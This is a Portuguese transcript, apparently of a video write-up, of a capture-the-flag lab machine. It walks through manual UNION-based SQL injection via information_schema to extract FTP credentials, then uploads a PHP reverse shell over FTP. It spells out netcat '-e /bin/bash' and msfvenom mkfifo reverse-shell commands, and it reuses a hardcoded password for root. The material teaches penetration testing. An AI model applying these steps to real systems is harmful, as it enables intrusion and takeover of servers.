Fala pessoal, beleza? Vamos começar a nossa 14ª máquina, a máquina Delivery. Essa máquina ela é bem tranquila, né, de fazer a exploração, ainda mais se você usar um SQL Map da vida que é automatizado, né, é bem facinho de explorar, mas a gente vai fazer a exploração aí do SQL Injection dessa máquina na mão e a gente vai então conseguir um acesso aí de um FTP nessa máquina, então a gente vai inserir a nossa shell, né, e fazer o nosso escalonamento de privilégio aí, explorando o password hard-coded na aplicação. Beleza? A máquina ela é bem tranquila de explorar, então o maior objetivo aqui nessa máquina é a gente aprender sobre o SQL Injection, beleza? Assim, eu não recomendo que vocês façam utilizando um SQL Map, porque aí você não vai aprender sobre como fazer o SQL Injection, né? E não vai acabar não estudando sobre banco de dados. Então, eu sugiro que você faça a exploração manual, como a gente vai fazer aqui no vídeo, tá? Bom, vou abrir aqui o nosso Kali. Eu já peguei o IP da máquina aqui, né? Vamos começar fazendo aquele nosso scan básico. Nmap menos Szinho Vzão. Menos V 192.68.2.32, que é o IP que ela pegou aqui. A gente já, a princípio, só a porta 80 e a porta 21 estão abertas, né? A gente não escaneou todas as portas, escaneou só as principais. Tem um monte de porta fechada aqui de autenticação do Cloud Fusion aqui, ó, estranho. Mas o que interessa pra gente aí é nesse primeiro momento, né? É que está aberta aqui a porta 80, rodando esse Apache aqui, e esse VSFTPD 303. Você já pode procurar aqui dando um search exploit para ver se tem alguma coisa nesse VSFTPD. Não encontrou nenhum exploit para essa versão. Ó. Tem exploit pro VSTPD, mas é na versão 234, não é nessa versão 303. Então, se a gente abrir a aplicação aqui no browser, deixa eu abrir meu browser aqui. Carregando aqui. Se a gente abrir a aplicação aqui no browser, no 2.68.2.32, a gente vai receber aqui uma tela default do Apache, né? Então a gente precisa fazer uma enumeração aí desse cara para ver o que a gente consegue encontrar lá dentro dele. Vamos utilizar o dib. E nesse caso, se você for enumerar diretórios, você não vai encontrar muita coisa. Então a gente vai procurar por arquivos PHP dentro desse cara. Claro que na vida real e nos testes você ia ter que procurar fazer vários testes primeiro até chegar nessa conclusão, né? Mas você pode passar aqui o http 192.168.2.32. Você vai passar o "-x" maiúsculo aqui e PHP para ele procurar por arquivos PHP. Então, com extensão, né, .php, um pontinho aqui. Então, o que ele vai fazer? Ele vai pegar o word list que você está passando e no final de cada palavra da lista ele vai colocar um ponto .php para testar, né? "-d" para passar o diretório de onde está a word list, né? /usr share word lists dib /big. Então, ó, ele está testando, ó, já acabou na verdade, ó. Ele achou aqui então o arquivo library.php, ó. Porque a gente o "-x" "-x.php", ele só inseriu o .php no final dessa lista aqui do dib. Então, se você fosse passar outro formato de arquivo, né, que você quisesse testar, era só você escrever outro tipo de formato de arquivo. Então, agora se a gente vier aqui, né, dentro do site, der um /library.php, ele vai abrir aqui uma aplicação. A gente pode abrir o nosso burp aqui, que a gente vai utilizar bastante o burp nessa máquina. Vou jogar ele aqui para o lado e jogar o site para cá. Para a gente poder fazer o nosso SQL Injection aqui, né, ou para encontrar ele primeiramente, né, você pode vir aqui no proxy interceptar as requisições.
Então você já pode começar a analisar o que está rolando aqui, né? Ó, ele tá, a primeira vez eu cliquei em um dos países aqui, ó, e ele escreveu aqui embaixo, né, qual que foi o país que eu selecionei. Então vamos deixar ele seguir aqui. Não achou, ó, ele disse que não achou nenhuma informação. Vamos tentar um outro aqui. Na França. Ó, só que agora a gente tem apareceu aqui uma coisa que não aparecia antes, ó, que é esse Last Viewed aqui, ó, foi a última visualização. A gente não consegue saber o que é isso aqui porque ele está encodado, né, como URL. Então você pode selecionar ele aqui, clicar com o direito, ó, mandar para o decoder, send to decoder, e aqui dá um Smart Decode. Ó, ele já está mostrando aqui, né, qual foi a sua última visita. Então isso já mostra que talvez ele esteja salvando isso em algum lugar. Vamos deixar seguir aqui, vamos mexer mais um pouquinho na aplicação. Ó, agora ele já mudou aqui para England, ó, a nossa última visita. Ó. Então vou jogar lá pro decoder. Ó, então significa que ele está salvando isso num banco de dados, né, na aplicação, porque para ele saber que a minha última visita foi em England aqui, ó, significa que ele salvou isso em algum lugar. Então pode ser num arquivo, né, mas obviamente numa aplicação aí geralmente o pessoal utiliza de salvar esse tipo de informação num banco de dados. Você pode fazer um teste e tentar executar a requisição de novo sem encodar aqui a requisição. Você pode mandar para o repeater para você poder fazer testes na requisição, né? Aqui no repeater, ó, se você mandar um send, aqui no render ele renderiza a página igual aqui no browser. Se não estiver renderizando para vocês a página aí, aqui na descrição, nos links de material de apoio, tem um link que auxilia a corrigir isso, tá? Aqui dentro do Kali. Então aqui agora a gente consegue, né, ter uma visão aqui do que ele responde aqui no browser. E repare aqui embaixo ó, que ele mostra 2007 bytes, né? Então quando você vai fazer algum tipo de teste aqui dentro do Burp, né, principalmente de SQL Injection, como a gente está fazendo aqui agora, ou então se for fazer qualquer outro tipo de teste que vá modificar o comportamento da aplicação, você pode analisar aqui embaixo o número de bytes, que às vezes se não aparecer nada na tela, mas aumentar o número de bytes aqui, né, pode ser que tenha funcionado aí o seu teste, né. Nesse caso aqui, ó, ele está encodando a requisição, a gente pode tentar fazer a mesma requisição sem encodar para ver se vai funcionar. Ó, se a gente mandar aqui e ele não der nenhum erro, a gente consegue editar sem ter que ficar encodando, né? Mas se ele desse algum erro aqui na hora de renderizar depois que a gente tirou desencodou aqui, né, o last viewed, aí era só a gente vir aqui no decoder e o que a gente quiser injetar aqui, a gente mandar codificar de novo como URL ali. Então aqui nesse caso, ó, a gente viu que a gente consegue fazer essa requisição. Então a gente deduz que isso esteja salvo num banco de dados, né? Então a gente pode explorar aqui um SQL Injection, tentar explorar um SQL Injection. Geralmente no SQL Injection, se você inserir uma aspa simples assim, né, dentro do comando e executar ele, ele vai aparecer um erro, né, um warning em algum lugar. Mas às vezes não vai aparecer um warning, que nem nesse caso aqui, ó, ele não apareceu nada aqui, mas ele está injetável aqui dentro desse parâmetro. A gente pode não ter conseguido fazer aparecer algum warning, mas a gente pode continuar testando que a gente vai acabar encontrando algumas informações. Aqui nesses links que eu vou deixar para vocês, tem um link aqui, ó, que fala para vocês, né, sobre como se testar como se testar, né, um SQL injection e começar a enumerar e tentar descobrir qual que é a database primeiro, né? Um DBMS, para quem não sabe o que é um DBMS, né? É um Database Management Systems. Então o DBMS nada mais é do que o software, né, de gerência ali do banco de dados.
Então, aqui, vou deixar aqui o link para vocês lerem depois. Então, pense assim, ó, a gente precisa primeiro descobrir qual que é o banco de dados que está rodando lá, para aí a gente conseguir fazer o nosso SQL injection, porque não adianta eu sair executando um monte de comando SQL que nem louco numa injeção de SQL, sem saber qual que é o banco de dados, porque as sintaxes são diferentes, né? Então aqui ele dá uma dica para você encontrar qual que é o DBMS. Se você rodar um select no user underline name aqui e ele retornar, né, alguma coisa, retornar algum usuário, isso significa que vai ser um SQL da Microsoft, não, um SQL Server. Se você rodar um user dessa forma aqui e ele retornar, né, pode ser que seja um MySQL. Então, se você rodar um select user from dual aqui e ele retornar, pode ser que seja um Oracle. E assim vai, né? Então, nesse caso aqui, vamos tentar dar um select nesse user aqui para ver se ele vai retornar alguma coisa. Aqui nesse comando, você está vendo que ele está passando o last viewed, né? É igual a um nome de alguma coisa que ele trouxe aqui do banco de dados. Aparentemente, o que ele trouxe do banco de dados foi esse England aqui. Então, o que a gente pode fazer é o seguinte: a gente pode pôr o England aqui entre aspas, né, para a gente poder finalizar o comando que ele vai executar lá. Bom, acho que todo mundo já sabe o que é um SQL injection, né? Então, um comando que vai ser que é executado no banco, no SQL injection a gente concatena outros comandos, né? Usando alguns operadores lógicos para a gente conseguir fazer com que aquela execução que traz aquela informação traga mais do que aquela informação. Então, nesse caso aqui, provavelmente ele está dando um select lá no banco, onde ele, quando eu faço a visita aqui embaixo, ele deve estar inserindo no banco aonde eu estou, né? Por exemplo, eu selecionei aqui o Germany. Então ele deve ter inserido, aqui ele deve estar fazendo um select lá um insert lá no banco, né? Inserindo aonde eu estou e aqui ele deve estar fazendo um select para mostrar o last viewed aqui. Porque esse aqui é um parâmetro que estava em branco na nossa primeira requisição. Depois da segunda, ele já apareceu o England aqui. Então provavelmente ele está salvando aqui o que eu estou visitando e aqui ele está dando um select aonde eu tinha visitado anteriormente, né? Uma funçãozinha bem boba na aplicação aqui, mas é uma aplicação que está rodando aí e a gente vai tentar fazer o SQL Injection. Então a gente pode colocar aspas simples aqui para ele, para nesse select aqui ele trazer o England aqui para a gente, né? E não crashar com o nosso comando. Então a gente pode utilizar o comando union que ele serve para você unir uma query a outra query, né, que vai ser executada, né, ali no SQL. E a gente pode então fazer o teste para ver qual que é o DBMS que está rodando aqui, né, qual que é o banco de dados que está rodando. Então você lembra que o que a gente viu no link aqui, se a gente conseguir trazer uma resposta do user aqui, ó, significa que talvez seja um MySQL, né? Então a gente pode dar um union select para ele dar um select além para juntar, né, esse select que a gente vai dar com o outro select que ele já está fazendo ali. Então a gente pode chamar o user para a gente ver se ele vai conseguir trazer essa informação para a gente em algum lugar aqui na página. Então repare que a requisição normal trouxe 2007 bytes. Então quando a gente executar esse cara aqui, agora trouxe 2025 bytes. Então, se você não estivesse vendo na tela aqui nada, né, não tivesse achado de primeira onde que veio a resposta, aqui embaixo você já consegue ver que veio uma resposta, porque ele aumentou os bytes aqui da página. E aqui, ó, repare que ele trouxe aqui, ó, que ele não podia encontrar nenhuma informação, só que isso aqui já estava escrito antes, né? E agora ele completou com username @localhost. Ou seja, a gente conseguiu identificar aqui que possivelmente esse cara é um MySQL, né? Por conta do teste que a gente fez ali para ver qual é o DBMS aí, né, nesse caso. Então agora que a gente sabe, que a gente conseguiu ver aqui qual é o user, a gente pode dar um select no database, que ele vai mostrar o nome da database que ele está utilizando, ó. Então a database que foi criada, né, que a aplicação está utilizando aí, se a gente conseguir fazer esse Union Select Database, ele vai trazer para a gente o nome da database. Ó. E a gente descobriu aqui, ó, que o nome da database é Library, ó, tá vendo? Que ele mudou aqui a resposta para Library.
Então a gente já conseguiu a primeira informação aí do nosso recon, que é qual que é o nome, né, da database. Então agora para a gente conseguir descobrir quais são as tabelas que estão dentro desse database, tem um cara que chama Information Schema, que esse cara ele salva metadados sobre as tabelas, né, e sobre as informações que tem dentro dos esquemas ali nesse banco de dados. Então aqui tem uma documentação para vocês lerem aqui para quem não souber como isso funciona, que explica, né, bem certinho como funciona o Information Schema. Aqui ele fala aqui que o que que é metadado, né, que são dados que trazem informações sobre outros dados, né? Então tem aqui ele explica o que que é o Information Schema. Então é legal vocês darem uma lida aqui para quem não conhece muito de bancos de dados. E ele dá alguns exemplos aqui, né, de como se chamar algumas tabelas dentro desse information schema, né? Aqui é o information schema.tables aqui, por exemplo, para trazer o que tem nas tabelas. Assim a gente vai conseguindo fazer um recon aqui para ver o que tem dentro dessa database que a gente encontrou aqui que chama library. Então agora que a gente sabe que a database chama library, a gente pode aqui nesse nosso select, né, que a gente está somando o nosso select com o select que ele já está fazendo ali no banco, a gente pode chamar o table name dentro do information schema, tá? Table, porque a gente quer saber qual que é o table name, né? From, né? Para que a gente vai, então, o table name do information schema.tables, né? Que é aquela funçãozinha ali que a gente viu que mostra quais são as tabelas. Então a gente quer saber o nome da tabela e a gente está perguntando isso para o information schema. Table name from information underline schema ponto tables. E a gente já sabe qual que é o nome da tabela, porque a gente viu aqui que é library. Então a gente está dizendo aqui, né, que a gente quer saber qual é o nome da tabela dentro, né, do information schema.tables, que vai trazer o metadado de todas as tabelas. Então a gente vai dizer where aqui, né, onde o table schema é igual a library. O que é o table schema, né? É o database. Então esse database que a gente viu que chama library, a gente quer estar perguntando aqui a gente está perguntando para o information schema quais são as tabelas que tem dentro do library, né? Quais são as tabelas que tem aqui dentro, né? Então eu vou executar esse cara aqui. Ó, ele mostrou que tem uma tabela chamada countries aqui, ó. Então a gente sabe que no database library tem uma tabela chamada countries. E assim a gente vai seguindo aqui com o nosso recon. Então a gente vai continuar aqui o nosso comando, tá? A gente ainda quer saber, né? Agora que a gente já sabe qual que é o information, aqui, pelo information schema a gente já sabe qual que é a tabela que a gente tem aqui dentro do library, né? Que é o countries. A gente quer ver se tem, né, alguma outra tabela além dessa, porque ele só está mostrando um parâmetro aqui. Então a gente vai continuar fazendo aqui o nosso select table name, do jeito que está aqui, né? From information schema ponto tables aqui da mesma forma, onde table schema é igual a libraries, e a gente pode colocar aqui um end, né, para usar um operador lógico aqui. E vai passar o nome dessa tabela também, table name, que seja diferente, né? Que o sinal de diferente, opa, exclamação igual, que seja diferente a countries. Porque countries é a primeira tabela que ele trouxe para a gente. Então vamos ver o que tem depois, né? Então a gente está dizendo aqui que a gente quer ver no information schemas.tables, né, onde o table schema se chama library, e o table name é diferente de country. Então ele vai trazer para a gente, ó, que existe a próxima tabela que tem lá dentro chama axis aqui, ó. Ele trouxe para a gente que a próxima chama axis. Então aqui na tabela axis
já interessa para a gente, porque Axis já quer dizer que é uma tabela de acesso, ou seja, vai ter usuários aí nessa tabela, né? Então a gente já pode continuar fazendo aqui o nosso recon para ver se a gente consegue trazer alguma informação dentro dessa tabela Axis aqui. Então agora a gente já pode apagar aqui esse rolê todo que a gente fez, porque a gente já sabe que dentro da database library tem uma tabela chamada Axis. Então agora a gente vai tentar ver o que tem dentro, né? Quais são as colunas que tem dentro dessa tabela. Então agora, como a gente já fez o table name, a gente vai chamar o column name, column underline name. Então a gente vai perguntar para o information schema de novo, né? From information underline schema ponto columns, porque a gente quer. Opa, faltou um N aqui no meu column. É isso mesmo, column name from information schema columns, porque a gente está perguntando para o information schema. Lembra que o information schema ele tem todos os metadados aí sobre as tabelas e colunas e etc que estão aqui dentro desse banco, né? Então a gente está perguntando para o information schema.columns quais são as colunas, né? Que estão aonde, né? Where table name, que é o nome da tabela, table underline name, igual axis, que foi o que a gente encontrou aqui, ó, axis. Então, se der certo a nossa requisição aqui, ele vai trazer, né, qual que é a primeira coluna, a primeira coluna dentro da tabela axis, né? Ó, então ele já trouxe para a gente que a primeira coluna da tabela axis é o password, ó. Então a gente já sabe que a gente achou aqui a tabela, né, a coluna de password dentro do Axis aqui. Então a gente pode fazer da mesma forma que já hoje, ó, agora a gente vai dar então um end aqui com o operador lógico, né, e a gente vai chamar de novo column name e vai dizer que a gente quer ver algo que seja diferente de password. Da mesma forma como a gente fez antes. Então a gente viu que a próxima coluna é username, né, dentro dessa tabela Axis que a gente encontrou aqui. Então agora que a gente já enumerou, que a gente já sabe que dentro do Database Library tem uma tabela, né, que se chama Axis. Opa, desculpa, tem uma tabela aqui que se chama Axis, e dentro da tabela Axis a gente tem o username e o password. Então agora a gente pode fazer um select nesse cara para poder ler a informação que tem dentro, né, dentro desses campos que a gente encontrou. Então agora é só fazer um select comum aqui. Então select username. A gente poderia passar username e password, mas ele só está mostrando um parâmetro aqui. Por quê? Porque o select que ele está fazendo no banco tá trazendo para a gente aqui somente a informação, o nome do país aqui que ele está dando select. Então, se a gente inserir aqui o mais do que uma resposta aqui, mais do que um campo, né, nesse select, ele só vai mostrar o primeiro, não vai mostrar o segundo. Então, a gente vai ter que ver um de cada vez. Então, a gente sabe que o campo, a coluna username, ela está dentro da tabela Axis. Então, a gente vai dar um from Axis. Então, a gente acabou de descobrir que o primeiro usuário que aparece aqui dentro do banco é o usuário Globus, ó. Então a gente descobriu que o primeiro usuário aqui chama Globus. Então se a gente trocar aqui para password, esperar ele a boa vontade aqui do servidor, a gente descobriu que a senha do usuário Globus é around the world. Então agora a gente pode tentar fazer alguma coisa com essa senha, né? Se você fizer um recon na aplicação aqui, você não vai achar mais nada onde você consegue se logar ou coisa do tipo dentro dessa aplicação. Mas lá no nosso scan a gente viu que tem um VSFTP rodando na máquina. Então a gente pode tentar fazer uma conexão no FTP utilizando esse usuário aí. Então vou dar um FTP aqui
192.168.2.32. O usuário que a gente encontrou lá é o usuário. Esqueci, deixa eu ver aqui de novo. É Globus. Peraí. Eu acho que era user mesmo. Vamos ver. Não era user, era username. Username from access. Usuário Globus. Então a gente pode vir aqui no nosso Kali, né, se conectar com o usuário Globus. E a senha que a gente vai passar é aquela senha que a gente viu lá, around the world, né? Deixa eu só confirmar se é isso mesmo. Eu não lembro se é com letra maiúscula ou não, deixa eu rodar de novo aqui. É isso mesmo, around the world com as iniciais maiúsculas. Beleza, então a gente vai logar aqui, around the world. Então a gente conseguiu se logar aqui no FTP. Então agora a gente pode navegar aqui para ver o que tá rodando nesse cara, né? Se a gente dá um pwd aqui, ó, ele está mostrando que ele está na raiz do server. Então vamos ver que esse HTML que ele está mostrando aqui, ó, é um diretório, né? E é um diretório que a gente tem todas as permissões dentro dele. Vamos ver o que está rodando no HTML. Geralmente esse tipo de coisa acontece, né? De você ter um FTP assim, que o pessoal utiliza para fazer deploy de coisas dentro do servidor lá, né? No site. E provavelmente é o que está rolando aqui, ó, porque a gente acessou o library.php lá, ó. Então a gente sabe que talvez esse cara esteja lá dentro do server. Se der um pwd aqui, ó, no barra HTML, a gente pode supor que seja o barra HTML lá no site. Então vamos tentar criar um arquivinho aqui para a gente ver se realmente é isso, né? Vou deixar maior aqui para vocês conseguirem ver. Deixa eu escrever aqui chamar esse arquivo aqui de A mesmo, só para a gente testar. Vou fazer um upload dele aqui. A gente fez o upload do A aqui para dentro do server. Vamos tentar abrir ele aqui no browser para ver se ele vai funcionar. Deixa eu desabilitar o proxy aqui, que senão ele vai ficar interceptando a minha requisição. Ó, ele já achou o arquivo, só que deu forbidden, então ele não teve permissão de abrir o arquivo. Então pode ser que ele fez o upload, né? Porque a gente conseguiu chamar, realmente era isso. Esse é o diretório do web server, mas ele não teve permissão para executar. Então a gente pode vir aqui de novo no nosso FTP. Se você der um help aqui, você vai ver que ele tem vários comandos que a gente pode executar aqui dentro, né? Que são bem parecidos aí com o Linux. E tem o comando chmod aqui, ó, que é para dar a permissão igual lá no Linux, né? O chmod dá a permissão do arquivo. Então vamos dar um chmod 777 aqui, que para dar todos os tipos de permissão possível para o A. Então ó, ele conseguiu dar um site chmod aqui, funcionou. Então se a gente voltar aqui agora e abrir o A, ó, funcionou o nosso teste. Então isso significa que se a gente inserir um arquivo aqui com uma shell, a gente vai conseguir se conectar nesse cara. Vamos dar um del aqui para apagar o A que a gente criou lá, né, para não deixar o A lá. Então a gente pode fazer uma conexão reversa aí no servidor. Tem vários jeitos de a gente fazer isso. A gente vai criar uma shell em PHP, né? E essa shell de PHP vai abrir a conexão com a gente aqui. Então, se lembra do Pentest Monkey lá que tinha várias shells bem legais lá, a gente pode pegar aqui essa de PHP, que tem uma shell reversa de PHP aqui, mas a gente não vai executar o PHP-R ali, que seria a linha de comando, né? Vamos copiar a instrução do SOC aqui. Então, vou chamar de a.php. Então a gente inicia aqui o nosso PHP normalmente, né? Deixa eu colar aquele cara aqui dentro. Então ele está abrindo uma conexão socket aqui. Vamos passar o IP do Kali aqui. 192.168.2.5, que é o IP do meu Kali.
na porta 443 como sempre. Então ele vai executar um bin sh aqui, né, dentro lá do server. Vamos ver se ele vai funcionar esse cara aí. Opa, dá um wk aqui para salvar. Deixa eu fazer um put para enviar lá para o servidor. a.php chmod 777 a.php. Então vamos startar aqui no Kali, né, o nosso handler. Então sudo nc de netcat menos nlvp para ficar escutando em modo verboso na porta 443. Eu vou abrir aqui um novo terminal. Vou dar um CURL lá para ver se ele vai rodar o PHP. CURL é http .192.168.2.32/a.php. Ó, ele executou o a.php, ele abriu a sessão com a gente aqui, mas ele matou a sessão. Então provavelmente o código que a gente escreveu ali, ele abre a sessão, mas ele parou de executar e a gente perdeu a nossa conexão. Então vamos deletar ele aqui, a.php. A gente pode fazer uma conexão via netcat mesmo. Deixa eu editar aqui o a.php. Deixa eu deletar esse cara aqui. E aqui nesse exec, a gente já viu que está funcionando o exec. Então vamos tentar fazer direto um netcat aqui, ó. nc 192.168.2.5, que é o IP do Kali, na 443. "-e para executar o /bin /bash. Vou salvar esse cara aqui. Vou fazer de novo o put do a.php, né? Dar o chmod para ele aqui. Vamos executar de volta o nosso handler aqui do netcat, né, na 443. E vou chamar de novo então a backdoor que a gente inseriu lá. E não funcionou. Vamos tentar chamar no browser aqui para ver se vai. 2.68.2.32/a.php. Tá, ele está abrindo, mas não está funcionando. Então vamos editar de novo esse cara. Apagar o a.php de lá. Vamos editar esse cara aqui. Deixa eu apagar esse cara aqui. A gente pode utilizar o MSF Venom para criar a conexão do netcat com o mkfifo, lá igual a gente fez na máquina anterior. Então vou dar um MSF Venom aqui, "-p de payload, cmd/unix, /reverse underline netcat, lhost igual a 192.168.2.5, lport igual a 443, "-f-hal para mostrar o código. Então ele vai printar aqui para a gente o payload, né? Ele vai utilizar o mkfifo e fazer a conexão reversa aqui com a gente, né? Payload do netcat reverso que a gente já utilizou antes aqui. Vou esperar a boa vontade aqui do meu Kali. Beleza. Talvez com esse cara aqui funcione. Vamos ver. Deixa eu editar aqui o começo que ficou errado as aspas. Beleza, eu vou passar o endereço do Kali aqui. Opa, já estava certo. 192.168.2.5, tá certinho já. Vim aqui no final. Então ele tá criando um arquivo temporário lá no /tmp e ele tá escrevendo a conexão do netcat nesse arquivo, né? E executando o bin sh, e depois ele apaga, e deixa rodando em background e apaga esse arquivo. Então pode ser que agora dê certo, porque a primeira conexão que a gente fez, o problema foi que a hora que fechou a conexão, a gente caiu, né? Então ele abriu a conexão e já na sequência caiu. Vamos tentar rodar dessa forma aqui para ver se vai. Fazer o upload para lá. Dar um chmod, beleza. Startar o nosso handler de novo. E vamos chamar ele lá. Então agora funcionou. Agora que a gente chamou o exploit lá, o nosso backdoor que estava lá, a gente conseguiu aqui então o acesso, né, do usuário www.data.
porque ele ficou rodando em background lá, ele virou um processo aqui. Então, se eu der um ps-alt aqui agora, ó, pipe grep mkfifo, você vai ver que ele está rodando aqui em background, ó, com o usuário www.data, ele startou, ó, o comando bem exatamente o comando que a gente passou, tá vendo, ó? E ele está rodando em background. Então vamos spawnar aqui um pty, python -c import pty pty.spawn para instanciar a função spawn que vai chamar o /bin /bash. Beleza. Então a gente conseguiu aqui o nosso primeiro acesso, né? Vou até sair desse FTP aqui. Se você der um name-a aqui, você vai ver que está rodando um Ubuntu lá num kernel 4.4.0.21. Tem alguns exploits aí para esse kernel, mas a gente não vai executar exploit de kernel aqui, porque a ideia dessa máquina aqui era mais estudar o SQL Injection, né? Aqui dentro da aplicação mesmo, ó, se você der sempre que você puder não explorar o kernel e explorar alguma outra coisa para você conseguir escalonar privilégio, é melhor, tá? Porque às vezes na tua exploração de kernel você pode acabar crashando a máquina aí na vida real. Então, acostume a sempre tentar procurar algum jeito de escalonar privilégios sem precisar explorar o kernel. Deixe isso tipo sempre para tipo último dos casos assim. Que às vezes é melhor você simplesmente informar para o cara lá que talvez esteja vulnerável a essa exploração de kernel do que você tentar explorar e parar o serviço do cara lá e dar um BO, né, em produção pro teu cliente. Então, uma coisa que pode te ajudar é sempre procurar arquivos de configuração em sistemas, que nesses arquivos de configuração pode ser que tenha um password, né? Ou então procurar por arquivos que você consiga escrever. Tem vários métodos aí de pós-exploração que a gente já viu em outras máquinas aqui sem precisar explorar o kernel. Nesse caso aqui, ó, se você ler o arquivo library.php aqui, opa, escrevi errado. Cat library aí, .php. Ele tem aqui algumas configurações, né, e tem tudo o que a aplicação faz, mas aqui, ó, o database user é username e o database password é password. Então você já conseguiu ver que o padrão de senha aqui é extremamente fraco, né? Então se você tentar se conectar com o usuário root e tentar passar essa senha para ele, por mais bobo que pareça, né, dessa forma você consegue fazer aqui consegue se conectar no usuário root, quer ver, ó? Porque a senha do usuário root é password, exatamente igual a senha que estava hardcoded ali do banco de dados. Então a gente conseguiu aqui, ó, se conectar como root, tanto que se você for em /root aqui, ó, não tem nem flag aqui pra gente, né? Eu acho que a ideia dessa máquina não era nem essa questão de escalonamento de privilégio, era mais para a gente aprender o SQL Injection mesmo. Então, assim, esse exemplo foi muito bobo, né? Essa senha password aqui para root foi uma senha extremamente boba, mas isso pode acontecer na vida real. Você pode encontrar dentro da aplicação arquivos de configuração e o padrão de senha que o cara utilizou na aplicação, às vezes é até a mesma senha, o mesmo usuário e senha dentro do sistema. Então, nesse caso aqui, a senha do root era password, da mesma forma que estava hardcoded aqui a senha do database. Então, você pode, claro que você pode, né, procurar exploits aqui para essa versão de kernel aqui. Vai ter o double put lá e tem outros exploits para esse kernel aqui. Mas lembra que eu falei para vocês, então explorar kernel é sempre o último dos casos, porque aí você pode acabar crashando a máquina. Beleza? Aqui na descrição tá os links de apoio para vocês estudarem aí com relação a esse SQL Injection. Evitem de utilizar SQL Map, tá? Eu sei que tem um monte de vídeo aqui do canal, né, das máquinas de write up aqui, que tem bastante coisa utilizando o SQL Map, mas assim, na vida real não tem problema você automatizar algumas coisas, né? Só que principalmente para quem está estudando para o SCP, no SCP você não pode usar o SQL Map, né? Você tem que rodar o SQL Injection na mão se tiver vulnerabilidade de SQL Injection. Então, vocês precisam estudar isso aí, né? Aproveita essa máquina aqui para entender bem esse lance aí que a gente fez do Information Schema, para entender bem esse recon que a gente fez do banco de dados, né? E aproveita para estudar um pouquinho de banco aí, porque é importante em relação a SQL Injection, beleza?
Aqui embaixo na descrição também está o link da máquina de amanhã. Se alguém tiver alguma dúvida, manda lá no grupo. Se não se inscreveu no canal ainda, se inscreve aí. E até amanhã, galera. Valeu!